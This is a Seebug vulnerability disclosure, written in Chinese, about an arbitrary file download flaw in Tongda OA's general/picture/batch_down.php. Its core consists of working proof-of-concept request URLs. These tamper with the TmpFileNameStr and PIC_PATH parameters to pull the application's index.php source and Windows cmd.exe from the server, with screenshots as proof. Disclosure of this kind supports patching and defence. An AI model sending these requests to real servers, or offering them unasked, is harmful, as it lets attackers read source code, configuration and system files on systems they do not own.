通达OA任意文件下载漏洞

2015-12-03T00:00:00
ID SSV:96125
Type seebug
Reporter Root
Modified 2015-12-03T00:00:00

Description

简要描述:

通达OA任意版本任意文件下载漏洞,可以下载电脑上任意文件。 官网最新版作演示:

详细说明:

正常下载图片: http://.../general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF

<img src="https://images.seebug.org/upload/201512/02125631b3e4c6c0e5c8ef422253ef68699b9035.png" alt="oa1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201512/02125702cbf0b26b31d005ca586aabec6ccb9621.png" alt="oa2.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201512/02125712a9766111f1e49bbda8d72fdc26bf3f7c.png" alt="oa3.png" width="600" onerror="javascript:errimg(this);">

修改路径下载文件: 下载index.php: http://.../general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot

<img src="https://images.seebug.org/upload/201512/021257340f80e7e42e5a47508798f0f8b2de785f.png" alt="oa4.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201512/0212574657426cf6e422e60f579310a8500d361f.png" alt="oa5.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201512/02125757f9bae3ade27d1d070cf410df57b4b516.png" alt="oa6.png" width="600" onerror="javascript:errimg(this);">

下载cmd.exe: http://.../general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32

<img src="https://images.seebug.org/upload/201512/021258470ff00bd297d419e93751cce5737baded.png" alt="oa7.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201512/02125856f26668ebb0e398c01b6996b1ac9dfbd0.png" alt="oa8.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

如上。